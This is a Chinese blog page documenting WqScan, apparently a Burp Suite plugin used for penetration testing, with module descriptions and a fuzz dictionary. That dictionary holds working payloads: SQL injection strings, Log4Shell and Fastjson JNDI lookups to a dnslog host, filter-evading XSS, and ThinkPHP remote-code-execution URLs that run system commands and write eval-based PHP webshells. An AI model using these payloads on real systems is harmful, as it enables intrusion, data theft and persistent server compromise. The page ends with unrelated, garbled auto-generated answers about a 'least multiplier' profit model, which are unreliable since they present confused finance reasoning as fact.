WqScan(小乘级自动化辅助工具)

下载地址:

https://download.csdn.net/download/weixin_47183851/86746671

提示:
需要下载且不想付积分的请留言或微信私聊
解压密码(base64解码之后就是解压密码): bGd0MTM3MjQ3MzU4MjM=
WqScan 1.0 已经升级到了WqScan 2.0, 比较之前的wQScan 1.0做了很多功能上的升级, 特别自动审计漏洞方面的
需要新版的WqScan 2.0, 可以直接联系, 私发

联系方式

/*
*请简洁说明来意
*java在线执行
*https://c.runoob.com/compile/10/
*/
public class HelloWorld {
	public static void main(String[] args) {
        String charsets="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_,.!@#$%*";
		int[] xxxxx={53,55,59,54,56,59,55,57,60,54,55};
        String last_message="微";
		last_message=last_message+"信";
		last_message=last_message+"手";
		last_message=last_message+"机";
		last_message=last_message+"号";
		last_message=last_message+":";
		for (int i : xxxxx) {
			last_message=last_message+charsets.charAt(i);
		}
		System.out.println(last_message);
    }
    
}

WqScan插件变量

# WqScan插件每次请求都会替换http/https 数据包中 :::time 为当前时间: 11:36:19
:::time
# WqScan插件每次请求都会替换http/https 数据包中 :::date 为当前日期: 2023-1-20
:::date
# WqScan插件每次请求都会替换http/https 数据包中 :::Tstamp 为当前时间戳: 1280977330000
:::Tstamp
# WqScan插件每次请求都会替换http/https 数据包中 :::ralpha 为1个随机字母: b
:::ralpha
# WqScan插件每次请求都会替换http/https 数据包中 :::rdigit 为1个随机字母: 3
:::rdigit

Fuzz模块

  1. 智能模式可根据关键字自动筛选存在问题的fuzz测试条目, 显示黄色(告警色)
  2. Fuzz模块可加载自制规定语法的payload字典, 字典语法Fuzz模块附录见
  3. Fuzz模块的被动模式可根据提前设定的payload自动fuzz测试,
  4. 可指定fuzz测试指定域名, 多个域名用 ; 分隔, Fuzz模块则根据指定域名进行fuzz测试
  5. 可设定排除条件, 多个排除条件用 ; 分隔, Fuzz模块则根据排除条件匹配url中是否存在该条件, 存在则排除
  6. 可设定每个fuzz测试请求间隔时间, 秒为单位
  7. 可勾选自动搜索payload位置, TextEditor栏标志payload
  8. MessageEditor栏兼容 burp suite 编辑器的右键和快捷键
  9. 去重功能可根据url的唯一性进行去重(不排除同参数)
    Fuzz模块描述1
    Fuzz模块描述2
    直接 burp suite 的右键发送到WqScan插件
    Fuzz模块描述3
Fuzz payload 字典
'
''
6' and 1='1
6 and 1='2
6 and exists (select * from sysobjects)
6 and exists(select * from tableName)
6 and 1=(select @@VERSION)
6 And 1=(select db_name())
6 and 1=(select @@servername)
6 and 1=(select IS_SRVROLEMEMBER('sysadmin'))
6 and 1=(Select IS_MEMBER('db_owner'))
6 and 1= (Select HAS_DBACCESS('master'))
${jndi:ldap://jclqfx.dnslog.cn/Log4jTest}
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://jclqfx.dnslog.cn/","autoCommit":true}}
{"@type":"java.net.Inet4Address","val":"jclqfx.dnslog.cn"}
'and(select extractvalue(1,concat(0x7e,(select database()))))
'and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))
'and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))
'and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))
linsert:::1' and 1=(select top 1 table_name from information_schema.tables)--+::::::
linsert:::1' and 1=convert(int,db_name(),111) --+::::::
linsert:::1' and 1=cast(host_name() as int) --+::::::
linsert:::1 and 1=ctxsys.drithsx.sn(1,(select user from dual)) --::::::
linsert:::1 and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null --::::::
linsert:::1 and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null --::::::
linsert:::1 and 1=utl_inaddr.get_host_name((select (SELECT DISTINCT owner FROM all_tables where rownum=1) from dual))--::::::
linsert:::1 and 1=utl_inaddr.get_host_name((select user from dual))--::::::
rinsert:::'and(select updatexml(1,concat(0x7e,(select database())),0x7e))::::::
rinsert:::'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))::::::
rinsert:::'and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="TABLE_NAME")),0x7e))::::::
rinsert:::'and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))::::::
"><scr<script>ipt>top['ale'+'rt'].call(null,11111)</scr<script>ipt>
"><script>top['ale'+'rt'].call(null,111111)</script>
"><scRiPt>top['ale'+'rt'].call(null,1);</scrIPt>
"><div οnclick="top['ale'+'rt'].call(null,11111)">
<div οnmοuseenter="top['ale'+'rt'].call(null,1111)">
<div onclick ="top['ale'+'rt'].call(null,1111)">
<a href="javascript:top['ale'+'rt'].call(null,11111)">
<script>\u0061\u006C\u0065\u0072\u0074(1111)</script>
<script>+top['ale'+'rt'].call(null,111)</script>
<script src=data:text/javascript,top['ale'+'rt'].call(null,1111)></script>
<img src=x οnerrοr=top['ale'+'rt'].call(null,1111)>
<input οnfοcus=top['ale'+'rt'].call(null,1111) autofocus>
<input οnblur=top['ale'+'rt'].call(null,1111) autofocus><input autofocus>
<svg/οnlοad=prompt(1111);>
linsert:::/index.php?s=/index/index/xxx/@phpinfo()#::::::
linsert:::/index.php?s=a/b/c/{@phpinfo()}#::::::
linsert:::/index.php?s=a/b/c/@phpinfo()#::::::
linsert:::?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd::::::
linsert:::s=whoami&_method=__construct&filter&filter=system::::::
linsert:::_method=__construct&filter[]=system&method=get&server[REQUSET_METHOD]=whoami::::::
linsert:::?s=index/think\request/input?data[]=phpinfo()&filter=assert::::::
​linsert:::?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1::::::
​linsert:::?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=<?php%20phpinfo();?>::::::
​linsert:::?s=index/\think\template\driver\file/write&cacheFile=zxc0.php&content=<?php @eval($_POST[xxxxxx]);?>::::::
​linsert:::exp1 = '/index.php/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=zxc1.php&vars[1][]=<?php @eval($_POST[xxxxxx]);?>'::::::
​linsert:::?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ‘<?php @eval($_POST[xxxxxx]);?>'>zxc2.php'::::::
​linsert:::?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1::::::
​linsert:::?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1::::::
​linsert:::?s=index/\think\Request/input&filter=phpinfo&data=1::::::
​linsert:::?s=index/\think\Request/input&filter=system&data=操作系统命令::::::
​linsert:::?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E::::::
​linsert:::?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1::::::
​linsert:::?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系统命令::::::
​linsert:::?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1::::::
​linsert:::?s=index/think\request/input?data[]=phpinfo()&filter=assert::::::
​linsert:::?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1::::::
​linsert:::?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=<?php%20phpinfo();?>::::::


字典语法

模式:::payload:::匹配响应的正则(可选):::正则匹配成功则设置该颜色(可选)

xxxxxxxxxxxx
默认rinsert模式, 即追加到参数末尾

linsert:::llllllinsert:::name:::#FF00FF
linsert模式即添加到参数开始

minsert:::mmmmmminsert:::extractregexp:::color
minsert模式即插入到参数中间

rinsert:::rrrrrrinsert:::name:::#FF00FF
默认rinsert模式, 即追加到参数末尾

replace:::1,2,3,4,5,6,7,8,9,0:::-----replace:::extractregexp:::color
replace模式即从右到左匹配正则并替换到参数中, 多个正则用 , 分隔

mreplace:::a,b,c,d,e,f,g,h:::mmmmreplace:::name:::#FF00FF
mreplace模式即从中间到右匹配正则并替换到参数中, 多个正则用 , 分隔

提示: 请一个遵守:::语法, 否则WqScan插件将视为无效语法, 可选项可直接不提供, 但请保持:::格式, 例如: linsert:::llllllinsert::::::

unauth模块

unauth模块强制开启智能算法, 无论智能是否勾选, 都将开启编辑智能筛选, 显示黄色(告警色), 采用编辑距离算法, 判断新权限响应体的编辑距离大于参与运算的最长文本的长度1/4,则视为越权失败, 否则即越权成功

  1. unauth模块采用替换整个请求头的方式, 即就算是在url中的授权信息都可以进行越权测试, 请保证旧权限存在于旧请求数据包中, 否则无法替换成功
  2. 去重功能可根据url的唯一性进行去重(不排除同参数)
  3. 可指定unauth模块指定域名, 多个域名用 ; 分隔, unauth模块则根据指定域名进行unauth测试
  4. 可设定排除条件, 多个排除条件用 ; 分隔, Fuzz模块则根据排除条件匹配url中是否存在该条件, 存在则排除
  5. 被动模式可根据提前设定的授权进行自动unauth测试,
  6. 兼容 burp suite 编辑器的右键和快捷键

unauth模块描述1

sqlmap模块

sqlmap模块需手动开启sqlmap, 命令: python3 sqlmapapi.py -s -H 127.0.0.1 -p 9253
sqlmap模块强制开启智能算法, 无论智能是否勾选, 都将开启编辑智能筛选, 显示黄色(告警色)

  1. 去重功能可根据url的唯一性进行去重(不排除同参数)
  2. 可指定sqlmap模块指定域名, 多个域名用 ; 分隔, sqlmap模块则根据指定域名进行测试
  3. 可设定排除条件, 多个排除条件用 ; 分隔, sqlmap模块则根据排除条件匹配url中是否存在该条件, 存在则排除
  4. 被动模式可根据提前设定进行自动SQL注入测试,
  5. 原始数据包栏兼容 burp suite 编辑器的右键和快捷键
    手动开启sqlmap
    sqlmap模块描述

checkMe模块

checkMe模块支持用户设定常用渗透payload, 兼容burp右键菜单选择并设置到剪切板, 选择后可直接Ctrl+c黏贴
checkMe模块描述1
checkMe模块描述2

dirsearch模块

dirsearch模块使用 burp suite接口进行扫描, 效率比较低, 不推荐使用

  1. 递归扫描可根据url的路径进行递归扫描
  2. 去重功能可根据url的唯一性进行去重(不排除同参数)
  3. 可指定文件后缀, 多个文件后缀用 ; 分隔, dirsearch模块则根据指定文件后缀进行扫描
  4. 可指定dirsearch模块指定域名, 多个域名用 ; 分隔, dirsearch模块则根据指定域名进行扫描
  5. 可设定排除条件, 多个排除条件用 ; 分隔, dirsearch模块则根据排除条件匹配url中是否存在该条件, 存在则排除
  6. 被动模式可根据提前设定进行自动dirsearch目录扫描,
  7. 原始数据包栏兼容 burp suite 编辑器的右键和快捷键
  8. 智能模式可根据敏感文件关键字自动筛选存在问题的dirsearch测试条目, 显示黄色(告警色)

在这里插入图片描述
提示: 2xx, 3xx, 4xx, 5xx 只支持单项筛选

globalConfig模块

  1. globalConfig模块可以选择指定WqScan插件数据文件加载到插件
  2. globalConfig模块可以选择保存当前项目到指定目录, 默认在系统临时目录

globalConfig模块描述

### 回答1: 最小乘数法优化量本利模型通常可以通过计算机程序或数学公式来完成。数学公式需要计算期望收益、期望风险和期望现值,然后解决约束条件和自变量的最优化问题,从而获得最佳变量值。计算机程序的方法可以使用数值解法或穷举法,以找到最小乘数法的最优解。 ### 回答2: 量本利模型是一种常用的投资模型,它描述了利息在固定时间内按照一定利率和复利计算的增长规律。通过最小乘数法,我们可以优化量本利模型,以实现更高的投资回报。 首先,利用最小乘数法可以帮助我们找到最低的乘数,从而使得投资额在一定时间内最大化增长。要运用最小乘数法,我们需要确定投资的初始额、投资的时间长短和利率。在确定这些变量后,我们可以通过试探不同的乘数,找到最小乘数。 其次,最小乘数法还可以帮助我们确定投资的最佳策略。通过计算不同乘数下的投资回报率,我们可以选择最佳的乘数,以实现最大化的投资回报。这样,我们可以根据不同的投资策略,制定出更有效的投资计划。 此外,最小乘数法还能够帮助我们评估不同投资项目的风险与收益。通过计算不同乘数下的投资回报,我们可以比较不同投资项目的潜在收益,并根据风险承受能力选择最有利可图的投资项目。 最后,最小乘数法可以提醒我们及时调整投资策略。当我们发现投资回报逐渐减小,或者乘数逐渐增大时,就应该及时调整投资策略,以避免投资损失。 综上所述,通过最小乘数法,我们可以优化量本利模型,以实现最大的投资回报。根据投资额、时间长短和利率等变量,确定最小乘数,选择最佳的投资策略,并评估不同投资项目的风险与收益。同时,时刻关注投资回报和乘数的变化,及时调整投资策略,以实现更优化的投资效果。 ### 回答3: 量本利模型是一种通过计算本金和利率来确定最终收益的数学模型。在应用最小乘数法优化量本利模型时,我们可以考虑以下几个步骤: 1. 确定最小乘数法的求解目标 最小乘数法的目标是通过调整乘数的值来使得乘积最小化。在量本利模型中,我们可以将乘积看作是最终收益。因此,我们的目标是找到使得最终收益最小化的乘数值。 2. 确定变量和约束条件 在量本利模型中,变量通常包括本金、利率和时间。约束条件通常包括最终收益等于本金加上利息的积、利率必须大于等于零,本金和时间必须大于零等等。 3. 建立数学模型 使用最小乘数法,我们可以建立一个包含乘数的数学模型。通过对这个模型进行数学推导和求解,我们可以确定最小化乘积的乘数值。 4. 求解数学模型 使用数学工具和技巧,我们可以求解建立好的数学模型,得到最小乘数值。 5. 优化量本利模型 将求解得到的最小乘数代入原始的量本利模型中,我们可以得到优化后的模型。这个模型可以使得最终收益最小化,从而达到优化量本利模型的目的。 需要注意的是,最小乘数法只是一种优化方法之一,它适用于某些特定情况下的量本利模型。在实际应用中,我们还可以考虑其他的优化方法和技术,根据具体情况选择合适的方法来优化量本利模型。
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值